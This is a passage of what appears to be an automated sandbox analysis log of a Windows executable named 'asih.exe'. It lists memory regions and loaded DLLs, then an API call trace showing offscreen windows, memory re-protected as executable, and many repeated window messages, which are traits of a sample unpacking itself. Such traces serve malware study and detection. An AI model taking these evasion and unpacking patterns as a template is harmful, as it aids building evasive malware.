"pagefile_0x00000000020f0000" filename = "" Region: id = 471 start_va = 0x2220000 end_va = 0x225ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002220000" filename = "" Region: id = 472 start_va = 0x2260000 end_va = 0x229ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002260000" filename = "" Region: id = 473 start_va = 0x2810000 end_va = 0x290ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002810000" filename = "" Region: id = 474 start_va = 0x2910000 end_va = 0x2a0ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002910000" filename = "" Region: id = 632 start_va = 0x2a10000 end_va = 0x2a4ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002a10000" filename = "" Region: id = 633 start_va = 0x2a50000 end_va = 0x2b4ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002a50000" filename = "" Region: id = 634 start_va = 0x707e0000 end_va = 0x707e7fff monitored = 0 entry_point = 0x707e1920 region_type = mapped_file name = "rasadhlp.dll" filename = "\\Windows\\SysWOW64\\rasadhlp.dll" (normalized: "c:\\windows\\syswow64\\rasadhlp.dll") Region: id = 635 start_va = 0x6fc50000 end_va = 0x6fc96fff monitored = 0 entry_point = 0x6fc658d0 region_type = mapped_file name = "fwpuclnt.dll" filename = "\\Windows\\SysWOW64\\FWPUCLNT.DLL" (normalized: "c:\\windows\\syswow64\\fwpuclnt.dll") Region: id = 636 start_va = 0x71590000 end_va = 0x715aafff monitored = 0 entry_point = 0x71599050 region_type = mapped_file name = "bcrypt.dll" filename = "\\Windows\\SysWOW64\\bcrypt.dll" (normalized: "c:\\windows\\syswow64\\bcrypt.dll") Region: id = 637 start_va = 0x2100000 end_va = 0x2102fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "mswsock.dll.mui" filename = "\\Windows\\SysWOW64\\en-US\\mswsock.dll.mui" (normalized: "c:\\windows\\syswow64\\en-us\\mswsock.dll.mui") Region: id = 638 start_va = 0x22a0000 end_va = 0x22a7fff monitored = 0 entry_point = 0x22a19c0 region_type = mapped_file name = "wshqos.dll" filename = "\\Windows\\SysWOW64\\wshqos.dll" (normalized: "c:\\windows\\syswow64\\wshqos.dll") Region: id = 639 start_va = 0x22b0000 end_va = 0x22b0fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "wshqos.dll.mui" filename = "\\Windows\\SysWOW64\\en-US\\wshqos.dll.mui" (normalized: "c:\\windows\\syswow64\\en-us\\wshqos.dll.mui") Region: id = 640 start_va = 0x22a0000 end_va = 0x22a7fff monitored = 0 entry_point = 0x22a19c0 region_type = mapped_file name = "wshqos.dll" filename = "\\Windows\\SysWOW64\\wshqos.dll" (normalized: "c:\\windows\\syswow64\\wshqos.dll") Region: id = 641 start_va = 0x22b0000 end_va = 0x22b0fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "wshqos.dll.mui" filename = "\\Windows\\SysWOW64\\en-US\\wshqos.dll.mui" (normalized: "c:\\windows\\syswow64\\en-us\\wshqos.dll.mui") Region: id = 642 start_va = 0x22a0000 end_va = 0x22a7fff monitored = 0 entry_point = 0x22a19c0 region_type = mapped_file name = "wshqos.dll" filename = "\\Windows\\SysWOW64\\wshqos.dll" (normalized: "c:\\windows\\syswow64\\wshqos.dll") Region: id = 643 start_va = 0x22b0000 end_va = 0x22b0fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "wshqos.dll.mui" filename = "\\Windows\\SysWOW64\\en-US\\wshqos.dll.mui" (normalized: "c:\\windows\\syswow64\\en-us\\wshqos.dll.mui") Region: id = 644 start_va = 0x22a0000 end_va = 0x22a7fff monitored = 0 entry_point = 0x22a19c0 region_type = mapped_file name = "wshqos.dll" filename = "\\Windows\\SysWOW64\\wshqos.dll" (normalized: "c:\\windows\\syswow64\\wshqos.dll") Region: id = 645 start_va = 0x22b0000 end_va = 0x22b0fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "wshqos.dll.mui" filename = "\\Windows\\SysWOW64\\en-US\\wshqos.dll.mui" (normalized: "c:\\windows\\syswow64\\en-us\\wshqos.dll.mui") Thread: id = 8 os_tid = 0x13a0 [0126.552] GetCommandLineA () returned="\"C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\asih.exe\" " [0126.553] GetModuleHandleA (lpModuleName=0x0) returned 0x500000 [0126.553] LoadIconA (hInstance=0x0, lpIconName=0x7f00) returned 0x10027 [0126.557] LoadCursorA (hInstance=0x0, lpCursorName=0x7f00) returned 0x10003 [0126.557] RegisterClassExA (param_1=0x505218) returned 0xc1df [0126.557] CreateWindowExA (dwExStyle=0x0, lpClassName="aroka", lpWindowName="wait", dwStyle=0x40000, X=-2680, Y=-6870, nWidth=542, nHeight=485, hWndParent=0x0, hMenu=0x0, hInstance=0x500000, lpParam=0x0) returned 0x0 [0126.594] NtdllDefWindowProc_A (hWnd=0x80046, Msg=0x24, wParam=0x0, lParam=0x19fb04) returned 0x0 [0126.594] NtdllDefWindowProc_A (hWnd=0x80046, Msg=0x81, wParam=0x0, lParam=0x19faf8) returned 0x1 [0126.599] NtdllDefWindowProc_A (hWnd=0x80046, Msg=0x83, wParam=0x0, lParam=0x19fae4) returned 0x0 [0126.640] CreateWindowExA (dwExStyle=0x0, lpClassName="button", lpWindowName="turok", dwStyle=0x10000001, X=10, Y=10, nWidth=320, nHeight=40, hWndParent=0x80046, hMenu=0x2, hInstance=0x500000, lpParam=0x0) returned 0x0 [0126.640] GetLastError () returned 0x579 [0126.640] SendMessageA (hWnd=0x80046, Msg=0x111, wParam=0x0, lParam=0x37) returned 0x0 [0126.640] SendMessageA (hWnd=0x80046, Msg=0x111, wParam=0x0, lParam=0x36) returned 0xffffffff [0126.640] CreateFileA (lpFileName="last.inf" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\temp\\last.inf"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0126.640] GetLastError () returned 0x2 [0126.640] CreateWindowExA (dwExStyle=0x0, lpClassName="edit", lpWindowName=0x0, dwStyle=0x40000000, X=10, Y=70, nWidth=500, nHeight=430, hWndParent=0x80046, hMenu=0x1, hInstance=0x500000, lpParam=0x0) returned 0x70336 [0126.643] NtdllDefWindowProc_A (hWnd=0x80046, Msg=0x210, wParam=0x10001, lParam=0x70336) returned 0x0 [0126.643] CreateWindowExA (dwExStyle=0x0, lpClassName="edit", lpWindowName="turok", dwStyle=0x40000001, X=10, Y=380, nWidth=166, nHeight=34, hWndParent=0x1, hMenu=0x2, hInstance=0x500000, lpParam=0x0) returned 0x0 [0126.644] GetLastError () returned 0x578 [0126.644] lstrcpyA (in: lpString1=0x5052b8, lpString2="Romantic" | out: lpString1="Romantic") returned="Romantic" [0126.644] CreateFontIndirectA (lplf=0x50529c) returned 0x180a090c [0126.644] SendMessageA (hWnd=0x80046, Msg=0x111, wParam=0x505044, lParam=0x38) returned 0x0 [0126.644] MoveWindow (hWnd=0x80046, X=-3700, Y=-3080, nWidth=540, nHeight=483, bRepaint=0) [0126.644] NtdllDefWindowProc_A (hWnd=0x80046, Msg=0x46, wParam=0x0, lParam=0x19f894) returned 0x0 [0126.644] NtdllDefWindowProc_A (hWnd=0x80046, Msg=0x24, wParam=0x0, lParam=0x19f554) returned 0x0 [0126.644] NtdllDefWindowProc_A (hWnd=0x80046, Msg=0x83, wParam=0x1, lParam=0x19f86c) returned 0x0 [0126.646] NtdllDefWindowProc_A (hWnd=0x80046, Msg=0x47, wParam=0x0, lParam=0x19f894) [0126.646] NtdllDefWindowProc_A (hWnd=0x80046, Msg=0x3, wParam=0x0, lParam=0xf417f194) returned 0x0 [0126.646] SendMessageA (hWnd=0x80046, Msg=0x111, wParam=0x505008, lParam=0x38) returned 0x0 [0126.646] GetWindowRect (in: hWnd=0x80046, lpRect=0x19f3c0 | out: lpRect=0x19f3c0) returned 1 [0126.646] SendMessageA (hWnd=0x80046, Msg=0x111, wParam=0x0, lParam=0x39) [0126.646] SendMessageA (hWnd=0x80046, Msg=0x111, wParam=0x0, lParam=0x3a) [0126.646] SendMessageA (hWnd=0x80046, Msg=0x111, wParam=0x0, lParam=0x3b) [0126.646] VirtualAlloc (lpAddress=0x400000, dwSize=0x6000, flAllocationType=0x2000, flProtect=0x1) returned 0x0 [0126.646] SendMessageA (hWnd=0x80046, Msg=0x111, wParam=0x0, lParam=0x3c) [0126.646] VirtualAlloc (lpAddress=0x0, dwSize=0x6000, flAllocationType=0x2000, flProtect=0x1) returned 0x1f0000 [0126.647] SendMessageA (hWnd=0x80046, Msg=0x111, wParam=0x0, lParam=0x3d) [0126.647] VirtualAlloc (lpAddress=0x0, dwSize=0x6000, flAllocationType=0x1000, flProtect=0x4) returned 0x440000 [0126.647] VirtualProtect (in: lpAddress=0x440000, dwSize=0x6000, flNewProtect=0x40, lpflOldProtect=0x50508e | out: lpflOldProtect=0x50508e*=0x4) returned 1 [0126.652] SendMessageA (hWnd=0x80046, Msg=0x111, wParam=0x0, lParam=0x3e) [0126.652] SendMessageA (hWnd=0x80046, Msg=0x111, wParam=0x0, lParam=0x579) [0126.652] SendMessageA (hWnd=0x80046, Msg=0x111, wParam=0x5052ec, lParam=0x40) [0126.652] SendMessageA (hWnd=0x80046, Msg=0x401, wParam=0x5052e4, lParam=0x166) returned 0x0 [0126.652] SendMessageA (hWnd=0x80046, Msg=0x401, wParam=0x5052e4, lParam=0x166) returned 0x0 [0126.653] SendMessageA (hWnd=0x80046, Msg=0x401, wParam=0x5052e4, lParam=0x166) returned 0x0 [0126.653] SendMessageA (hWnd=0x80046, Msg=0x401, wParam=0x5052e4, lParam=0x166) returned 0x0 [0126.653] SendMessageA (hWnd=0x80046, Msg=0x401, wParam=0x5052e4, lParam=0x166) returned 0x0 [0126.653] SendMessageA (hWnd=0x80046, Msg=0x401, wParam=0x5052e4, lParam=0x166) returned 0x0 [0126.653] SendMessageA (hWnd=0x80046, Msg=0x401, wParam=0x5052e4, lParam=0x166) returned 0x0 [0126.653] SendMessageA (hWnd=0x80046, Msg=0x401, wParam=0x5052e4, lParam=0x166) returned 0x0 [0126.653] SendMessageA (hWnd=0x80046, Msg=0x401, wParam=0x5052e4, lParam=0x166) returned 0x0 [0126.653] SendMessageA (hWnd=0x80046, Msg=0x401, wParam=0x5052e4, lParam=0x166) returned 0x0 [0126.653] SendMessageA (hWnd=0x80046, Msg=0x401, wParam=0x5052e4, lParam=0x166) returned 0x0 [0126.653] SendMessageA (hWnd=0x80046, Msg=0x401, wParam=0x5052e4, lParam=0x166) returned 0x0 [0126.653] SendMessageA (hWnd=0x80046, Msg=0x401, wParam=0x5052e4, lParam=0x166) returned 0x0 [0126.653] SendMessageA (hWnd=0x80046, Msg=0x401, wParam=0x5052e4, lParam=0x166) returned 0x0 [0126.653] SendMessageA (hWnd=0x80046, Msg=0x401, wParam=0x5052e4, lParam=0x166) returned 0x0 [0126.653] SendMessageA (hWnd=0x80046, Msg=0x401, wParam=0x5052e4, lParam=0x166) returned 0x0 [0126.653] SendMessageA (hWnd=0x80046, Msg=0x401, wParam=0x5052e4, lParam=0x166) returned 0x0 [0126.653] SendMessageA (hWnd=0x80046, Msg=0x401, wParam=0x5052e4, lParam=0x166) returned 0x0 [0126.653] SendMessageA (hWnd=0x80046, Msg=0x401, wParam=0x5052e4, lParam=0x166) returned 0x0 [0126.653] SendMessageA (hWnd=0x80046, Msg=0x401, wParam=0x5052e4, lParam=0x166) returned 0x0 [0126.653] SendMessageA (hWnd=0x80046, Msg=0x401, wParam=0x5052e4, lParam=0x166) returned 0x0 [0126.654] SendMessageA (hWnd=0x80046, Msg=0x401, wParam=0x5052e4, lParam=0x166) returned 0x0 [0126.654] SendMessageA (hWnd=0x80046, Msg=0x401, wParam=0x5052e4, lParam=0x166) returned 0x0 [0126.654] SendMessageA (hWnd=0x80046, Msg=0x401, wParam=0x5052e4, lParam=0x166) returned 0x0 [0126.654] SendMessageA (hWnd=0x80046, Msg=0x401, wParam=0x5052e4, lParam=0x166) returned 0x0 [0126.654] SendMessageA (hWnd=0x80046, Msg=0x401, wParam=0x5052e4, lParam=0x166) returned 0x0 [0126.654] SendMessageA (hWnd=0x80046, Msg=0x401, wParam=0x5052e4, lParam=0x166) returned 0x0 [0126.654] SendMessageA (hWnd=0x80046, Msg=0x401, wParam=0x5052e4, lParam=0x166) returned 0x0 [0126.654] SendMessageA (hWnd=0x80046, Msg=0x401, wParam=0x5052e4, lParam=0x166) returned 0x0 [0126.654] SendMessageA (hWnd=0x80046, Msg=0x401, wParam=0x5052e4, lParam=0x166) returned 0x0 [0126.654] SendMessageA (hWnd=0x80046, Msg=0x401, wParam=0x5052e4, lParam=0x166) returned 0x0 [0126.654] SendMessageA (hWnd=0x80046, Msg=0x401, wParam=0x5052e4, lParam=0x166) returned 0x0 [0126.654] SendMessageA (hWnd=0x80046, Msg=0x401, wParam=0x5052e4, lParam=0x166) returned 0x0 [0126.654] SendMessageA (hWnd=0x80046, Msg=0x401, wParam=0x5052e4, lParam=0x166) returned 0x0 [0126.654] SendMessageA (hWnd=0x80046, Msg=0x401, wParam=0x5052e4, lParam=0x166) returned 0x0 [0126.654] SendMessageA (hWnd=0x80046, Msg=0x401, wParam=0x5052e4, lParam=0x166) returned 0x0 [0126.654] SendMessageA (hWnd=0x80046, Msg=0x401, wParam=0x5052e4, lParam=0x166) returned 0x0 [0126.654] SendMessageA (hWnd=0x80046, Msg=0x401, wParam=0x5052e4, lParam=0x166) returned 0x0 [0126.654] SendMessageA (hWnd=0x80046, Msg=0x401, wParam=0x5052e4, lParam=0x166) returned 0x0 [0126.655] SendMessageA (hWnd=0x80046, Msg=0x401, wParam=0x5052e4, lParam=0x166) returned 0x0 [0126.655] SendMessageA (hWnd=0x80046, Msg=0x401, wParam=0x5052e4, lParam=0x166) returned 0x0 [0126.655] SendMessageA (hWnd=0x80046, Msg=0x401, wParam=0x5052e4, lParam=0x166) returned 0x0 [0126.655] SendMessageA (hWnd=0x80046, Msg=0x401, wParam=0x5052e4, lParam=0x166) returned 0x0 [0126.655] SendMessageA (hWnd=0x80046, Msg=0x401, wParam=0x5052e4, lParam=0x166) returned 0x0 [0126.655] SendMessageA (hWnd=0x80046, Msg=0x401, wParam=0x5052e4, lParam=0x166) returned 0x0 [0126.655] SendMessageA (hWnd=0x80046, Msg=0x401, wParam=0x5052e4, lParam=0x166) returned 0x0 [0126.655] SendMessageA (hWnd=0x80046, Msg=0x401, wParam=0x5052e4, lParam=0x166) returned 0x0 [0126.655] SendMessageA (hWnd=0x80046, Msg=0x401, wParam=0x5052e4, lParam=0x166) returned 0x0 [0126.655] SendMessageA (hWnd=0x80046, Msg=0x401, wParam=0x5052e4, lParam=0x166) returned 0x0 [0126.655] SendMessageA (hWnd=0x80046, Msg=0x401, wParam=0x5052e4, lParam=0x166) returned 0x0 [0126.655] SendMessageA (hWnd=0x80046, Msg=0x401, wParam=0x5052e4, lParam=0x166) returned 0x0 [0126.655] SendMessageA (hWnd=0x80046, Msg=0x401, wParam=0x5052e4, lParam=0x166) returned 0x0 [0126.655] SendMessageA (hWnd=0x80046, Msg=0x401, wParam=0x5052e4, lParam=0x166) returned 0x0 [0126.655] SendMessageA (hWnd=0x80046, Msg=0x401, wParam=0x5052e4, lParam=0x166) returned 0x0 [0126.655] SendMessageA (hWnd=0x80046, Msg=0x401, wParam=0x5052e4, lParam=0x166) returned 0x0 [0126.655] SendMessageA (hWnd=0x80046, Msg=0x401, wParam=0x5052e4, lParam=0x166) returned 0x0 [0126.655] SendMessageA (hWnd=0x80046, Msg=0x401, wParam=0x5052e4, lParam=0x166) returned 0x0 [0126.656] SendMessageA (hWnd=0x80046, Msg=0x401, wParam=0x5052e4, lParam=0x166) returned 0x0 [0126.656] SendMessageA (hWnd=0x80046, Msg=0x401, wParam=0x5052e4, lParam=0x166) returned 0x0 [0126.656] SendMessageA (hWnd=0x80046, Msg=0x401, wParam=0x5052e4, lParam=0x166) returned 0x0 [0126.656] SendMessageA (hWnd=0x80046, Msg=0x401, wParam=0x5052e4, lParam=0x166) returned 0x0 [0126.656] SendMessageA (hWnd=0x80046, Msg=0x401, wParam=0x5052e4, lParam=0x166) returned 0x0 [0126.656] SendMessageA (hWnd=0x80046, Msg=0x401, wParam=0x5052e4, lParam=0x166) returned 0x0 [0126.656] SendMessageA (hWnd=0x80046, Msg=0x401, wParam=0x5052e4, lParam=0x166) returned 0x0 [0126.656] SendMessageA (hWnd=0x80046, Msg=0x401, wParam=0x5052e4, lParam=0x166) returned 0x0 [0126.656] SendMessageA (hWnd=0x80046, Msg=0x401, wParam=0x5052e4, lParam=0x166) returned 0x0 [0126.656] SendMessageA (hWnd=0x80046, Msg=0x401, wParam=0x5052e4, lParam=0x166) returned 0x0 [0126.656] SendMessageA (hWnd=0x80046, Msg=0x401, wParam=0x5052e4, lParam=0x166) returned 0x0 [0126.656] SendMessageA (hWnd=0x80046, Msg=0x401, wParam=0x5052e4, lParam=0x166) returned 0x0 [0126.656] SendMessageA (hWnd=0x80046, Msg=0x401, wParam=0x5052e4, lParam=0x166) returned 0x0 [0126.656] SendMessageA (hWnd=0x80046, Msg=0x401, wParam=0x5052e4, lParam=0x166) returned 0x0 [0126.656] SendMessageA (hWnd=0x80046, Msg=0x401, wParam=0x5052e4, lParam=0x166) returned 0x0 [0126.656] SendMessageA (hWnd=0x80046, Msg=0x401, wParam=0x5052e4, lParam=0x166) returned 0x0 [0126.656] SendMessageA (hWnd=0x80046, Msg=0x401, wParam=0x5052e4, lParam=0x166) returned 0x0 [0126.656] SendMessageA (hWnd=0x80046, Msg=0x401, wParam=0x5052e4, lParam=0x166) returned 0x0 [0126.657] SendMessageA (hWnd=0x80046, Msg=0x401, wParam=0x5052e4, lParam=0x166) returned 0x0 [0126.657] SendMessageA (hWnd=0x80046, Msg=0x401, wParam=0x5052e4, lParam=0x166) returned 0x0 [0126.657] SendMessageA (hWnd=0x80046, Msg=0x401, wParam=0x5052e4, lParam=0x166) returned 0x0 [0126.657] SendMessageA (hWnd=0x80046, Msg=0x401, wParam=0x5052e4, lParam=0x166) returned 0x0 [0126.657] SendMessageA (hWnd=0x80046, Msg=0x401, wParam=0x5052e4, lParam=0x166) returned 0x0 [0126.657] SendMessageA (hWnd=0x80046, Msg=0x401, wParam=0x5052e4, lParam=0x166) returned 0x0 [0126.657] SendMessageA (hWnd=0x80046, Msg=0x401, wParam=0x5052e4, lParam=0x166) returned 0x0 [0126.657] SendMessageA (hWnd=0x80046, Msg=0x401, wParam=0x5052e4, lParam=0x166) returned 0x0 [0126.657] SendMessageA (hWnd=0x80046, Msg=0x401, wParam=0x5052e4, lParam=0x166) returned 0x0 [0126.657] SendMessageA (hWnd=0x80046, Msg=0x401, wParam=0x5052e4, lParam=0x166) returned 0x0 [0126.657] SendMessageA (hWnd=0x80046, Msg=0x401, wParam=0x5052e4, lParam=0x166) returned 0x0 [0126.657] SendMessageA (hWnd=0x80046, Msg=0x401, wParam=0x5052e4, lParam=0x166) returned 0x0 [0126.657] SendMessageA (hWnd=0x80046, Msg=0x401, wParam=0x5052e4, lParam=0x166) returned 0x0 [0126.657] SendMessageA (hWnd=0x80046, Msg=0x401, wParam=0x5052e4, lParam=0x166) returned 0x0 [0126.657] SendMessageA (hWnd=0x80046, Msg=0x401, wParam=0x5052e4, lParam=0x166) returned 0x0 [0126.657] SendMessageA (hWnd=0x80046, Msg=0x401, wParam=0x5052e4, lParam=0x166) returned 0x0 [0126.657] SendMessageA (hWnd=0x80046, Msg=0x401, wParam=0x5052e4, lParam=0x166) returned 0x0 [0126.657] SendMessageA (hWnd=0x80046, Msg=0x401, wParam=0x5052e4, lParam=0x166) returned 0x0 [0126.657] SendMessageA (hWnd=0x80046, Msg=0x401, wParam=0x5052e4, lParam=0x166) returned 0x0 [0126.658] SendMessageA (hWnd=0x80046, Msg=0x401, wParam=0x5052e4, lParam=0x166) returned 0x0 [0126.658] SendMessageA (hWnd=0x80046, Msg=0x401, wParam=0x5052e4, lParam=0x166) returned 0x0 [0126.658] SendMessageA (hWnd=0x80046, Msg=0x401, wParam=0x5052e4, lParam=0x166) returned 0x0 [0126.658] SendMessageA (hWnd=0x80046, Msg=0x401, wParam=0x5052e4, lParam=0x166) returned 0x0 [0126.658] SendMessageA (hWnd=0x80046, Msg=0x401, wParam=0x5052e4, lParam=0x166) returned 0x0 [0126.658] SendMessageA (hWnd=0x80046, Msg=0x401, wParam=0x5052e4, lParam=0x166) returned 0x0 [0126.658] SendMessageA (hWnd=0x80046, Msg=0x401, wParam=0x5052e4, lParam=0x166) returned 0x0 [0126.658] SendMessageA (hWnd=0x80046, Msg=0x401, wParam=0x5052e4, lParam=0x166) returned 0x0 [0126.658] SendMessageA (hWnd=0x80046, Msg=0x401, wParam=0x5052e4, lParam=0x166) returned 0x0 [0126.658] SendMessageA (hWnd=0x80046, Msg=0x401, wParam=0x5052e4, lParam=0x166) returned 0x0 [0126.658] SendMessageA (hWnd=0x80046, Msg=0x401, wParam=0x5052e4, lParam=0x166) returned 0x0 [0126.658] SendMessageA (hWnd=0x80046, Msg=0x401, wParam=0x5052e4, lParam=0x166) returned 0x0 [0126.658] SendMessageA (hWnd=0x80046, Msg=0x401, wParam=0x5052e4, lParam=0x166) returned 0x0 [0126.658] SendMessageA (hWnd=0x80046, Msg=0x401, wParam=0x5052e4, lParam=0x166) returned 0x0 [0126.658] SendMessageA (hWnd=0x80046, Msg=0x401, wParam=0x5052e4, lParam=0x166) returned 0x0 [0126.658] SendMessageA (hWnd=0x80046, Msg=0x401, wParam=0x5052e4, lParam=0x166) returned 0x0 [0126.658] SendMessageA (hWnd=0x80046, Msg=0x401, wParam=0x5052e4, lParam=0x166) returned 0x0 [0126.658] SendMessageA (hWnd=0x80046, Msg=0x401, wParam=0x5052e4, lParam=0x166) returned 0x0 [0126.659] SendMessageA (hWnd=0x80046, Msg=0x401, wParam=0x5052e4, lParam=0x166) returned 0x0 [0126.659] SendMessageA (hWnd=0x80046, Msg=0x401, wParam=0x5052e4, lParam=0x166) returned 0x0 [0126.659] SendMessageA (hWnd=0x80046, Msg=0x401, wParam=0x5052e4, lParam=0x166) returned 0x0 [0126.659] SendMessageA (hWnd=0x80046, Msg=0x401, wParam=0x5052e4, lParam=0x166) returned 0x0 [0126.659] SendMessageA (hWnd=0x80046, Msg=0x401, wParam=0x5052e4, lParam=0x166) returned 0x0 [0126.659] SendMessageA (hWnd=0x80046, Msg=0x401, wParam=0x5052e4, lParam=0x166) returned 0x0 [0126.659] SendMessageA (hWnd=0x80046, Msg=0x401, wParam=0x5052e4, lParam=0x166) returned 0x0 [0126.659] SendMessageA (hWnd=0x80046, Msg=0x401, wParam=0x5052e4, lParam=0x166) returned 0x0 [0126.659] SendMessageA (hWnd=0x80046, Msg=0x401, wParam=0x5052e4, lParam=0x166) returned 0x0 [0126.659] SendMessageA (hWnd=0x80046, Msg=0x401, wParam=0x5052e4, lParam=0x166) returned 0x0 [0126.659] SendMessageA (hWnd=0x80046, Msg=0x401, wParam=0x5052e4, lParam=0x166) returned 0x0 [0126.659] SendMessageA (hWnd=0x80046, Msg=0x401, wParam=0x5052e4, lParam=0x166) returned 0x0 [0126.659] SendMessageA (hWnd=0x80046, Msg=0x401, wParam=0x5052e4, lParam=0x166) returned 0x0 [0126.659] SendMessageA (hWnd=0x80046, Msg=0x401, wParam=0x5052e4, lParam=0x166) returned 0x0 [0126.659] SendMessageA (hWnd=0x80046, Msg=0x401, wParam=0x5052e4, lParam=0x166) returned 0x0 [0126.659] SendMessageA (hWnd=0x80046, Msg=0x401, wParam=0x5052e4, lParam=0x166) returned 0x0 [0126.659] SendMessageA (hWnd=0x80046, Msg=0x401, wParam=0x5052e4, lParam=0x166) returned 0x0 [0126.659] SendMessageA (hWnd=0x80046, Msg=0x401, wParam=0x5052e4, lParam=0x166) returned 0x0 [0126.660] SendMessageA (hWnd=0x80046, Msg=0x401, wParam=0x5052e4, lParam=0x166) returned 0x0 [0126.660] SendMessageA (hWnd=0x80046, Msg=0x401, wParam=0x5052e4, lParam=0x166) returned 0x0 [0126.660] SendMessageA (hWnd=0x80046, Msg=0x401, wParam=0x5052e4, lParam=0x166) returned 0x0 [0126.660] SendMessageA (hWnd=0x80046, Msg=0x401, wParam=0x5052e4, lParam=0x166) returned 0x0 [0126.660] SendMessageA (hWnd=0x80046, Msg=0x401, wParam=0x5052e4, lParam=0x166) returned 0x0 [0126.660] SendMessageA (hWnd=0x80046, Msg=0x401, wParam=0x5052e4, lParam=0x166) returned 0x0 [0126.660] SendMessageA (hWnd=0x80046, Msg=0x401, wParam=0x5052e4, lParam=0x166) returned 0x0 [0126.660] SendMessageA (hWnd=0x80046, Msg=0x401, wParam=0x5052e4, lParam=0x166) returned 0x0 [0126.660] SendMessageA (hWnd=0x80046, Msg=0x401, wParam=0x5052e4, lParam=0x166) returned 0x0 [0126.660] SendMessageA (hWnd=0x80046, Msg=0x401, wParam=0x5052e4, lParam=0x166) returned 0x0 [0126.660] SendMessageA (hWnd=0x80046, Msg=0x401, wParam=0x5052e4, lParam=0x166) returned 0x0 [0126.660] SendMessageA (hWnd=0x80046, Msg=0x401, wParam=0x5052e4, lParam=0x166) returned 0x0 [0126.660] SendMessageA (hWnd=0x80046, Msg=0x401, wParam=0x5052e4, lParam=0x166) returned 0x0 [0126.660] SendMessageA (hWnd=0x80046, Msg=0x401, wParam=0x5052e4, lParam=0x166) returned 0x0 [0126.660] SendMessageA (hWnd=0x80046, Msg=0x401, wParam=0x5052e4, lParam=0x166) returned 0x0 [0126.660] SendMessageA (hWnd=0x80046, Msg=0x401, wParam=0x5052e4, lParam=0x166) returned 0x0 [0126.660] SendMessageA (hWnd=0x80046, Msg=0x401, wParam=0x5052e4, lParam=0x166) returned 0x0 [0126.660] SendMessageA (hWnd=0x80046, Msg=0x401, wParam=0x5052e4, lParam=0x166) returned 0x0 [0126.661] SendMessageA (hWnd=0x80046, Msg=0x401, wParam=0x5052e4, lParam=0x166) returned 0x0 [0126.661] SendMessageA (hWnd=0x80046, Msg=0x401, wParam=0x5052e4, lParam=0x166) returned 0x0 [0126.661] SendMessageA (hWnd=0x80046, Msg=0x401, wParam=0x5052e4, lParam=0x166) returned 0x0 [0126.661] SendMessageA (hWnd=0x80046, Msg=0x401, wParam=0x5052e4, lParam=0x166) returned 0x0 [0126.661] SendMessageA (hWnd=0x80046, Msg=0x401, wParam=0x5052e4, lParam=0x166) returned 0x0 [0126.661] SendMessageA (hWnd=0x80046, Msg=0x401, wParam=0x5052e4, lParam=0x166) returned 0x0 [0126.661] SendMessageA (hWnd=0x80046, Msg=0x401, wParam=0x5052e4, lParam=0x166) returned 0x0 [0126.661] SendMessageA (hWnd=0x80046, Msg=0x401, wParam=0x5052e4, lParam=0x166) returned 0x0 [0126.661] SendMessageA (hWnd=0x80046, Msg=0x401, wParam=0x5052e4, lParam=0x166) returned 0x0 [0126.661] SendMessageA (hWnd=0x80046, Msg=0x401, wParam=0x5052e4, lParam=0x166) returned 0x0 [0126.661] SendMessageA (hWnd=0x80046, Msg=0x401, wParam=0x5052e4, lParam=0x166) returned 0x0 [0126.661] SendMessageA (hWnd=0x80046, Msg=0x401, wParam=0x5052e4, lParam=0x166) returned 0x0 [0126.661] SendMessageA (hWnd=0x80046, Msg=0x401, wParam=0x5052e4, lParam=0x166) returned 0x0 [0126.661] SendMessageA (hWnd=0x80046, Msg=0x401, wParam=0x5052e4, lParam=0x166) returned 0x0 [0126.661] SendMessageA (hWnd=0x80046, Msg=0x401, wParam=0x5052e4, lParam=0x166) returned 0x0 [0126.661] SendMessageA (hWnd=0x80046, Msg=0x401, wParam=0x5052e4, lParam=0x166) returned 0x0 [0126.661] SendMessageA (hWnd=0x80046, Msg=0x401, wParam=0x5052e4, lParam=0x166) returned 0x0 [0126.661] SendMessageA (hWnd=0x80046, Msg=0x401, wParam=0x5052e4, lParam=0x166) returned 0x0 [0126.661] SendMessageA (hWnd=0x80046, Msg=0x401, wParam=0x5052e4, lParam=0x166) returned 0x0 [0126.661] SendMessageA (hWnd=0x80046, Msg=0x401, wParam=0x5052e4, lParam=0x166) returned 0x0 [0126.662] SendMessageA (hWnd=0x80046, Msg=0x401, wParam=0x5052e4, lParam=0x166) returned 0x0 [0126.662] SendMessageA (hWnd=0x80046, Msg=0x401, wParam=0x5052e4, lParam=0x166) returned 0x0 [0126.662] SendMessageA (hWnd=0x80046, Msg=0x401, wParam=0x5052e4, lParam=0x166) returned 0x0 [0126.662] SendMessageA (hWnd=0x80046, Msg=0x401, wParam=0x5052e4, lParam=0x166) returned 0x0 [0126.662] SendMessageA (hWnd=0x80046, Msg=0x401, wParam=0x5052e4, lParam=0x166) returned 0x0 [0126.662] SendMessageA (hWnd=0x80046, Msg=0x401, wParam=0x5052e4, lParam=0x166) returned 0x0 [0126.662] SendMessageA (hWnd=0x80046, Msg=0x401, wParam=0x5052e4, lParam=0x166) returned 0x0 [0126.662] SendMessageA (hWnd=0x80046, Msg=0x401, wParam=0x5052e4, lParam=0x166) returned 0x0 [0126.662] SendMessageA (hWnd=0x80046, Msg=0x401, wParam=0x5052e4, lParam=0x166) returned 0x0 [0126.662] SendMessageA (hWnd=0x80046, Msg=0x401, wParam=0x5052e4, lParam=0x166) returned 0x0 [0126.662] SendMessageA (hWnd=0x80046, Msg=0x401, wParam=0x5052e4, lParam=0x166) returned 0x0 [0126.662] SendMessageA (hWnd=0x80046, Msg=0x401, wParam=0x5052e4, lParam=0x166) returned 0x0 [0126.662] SendMessageA (hWnd=0x80046, 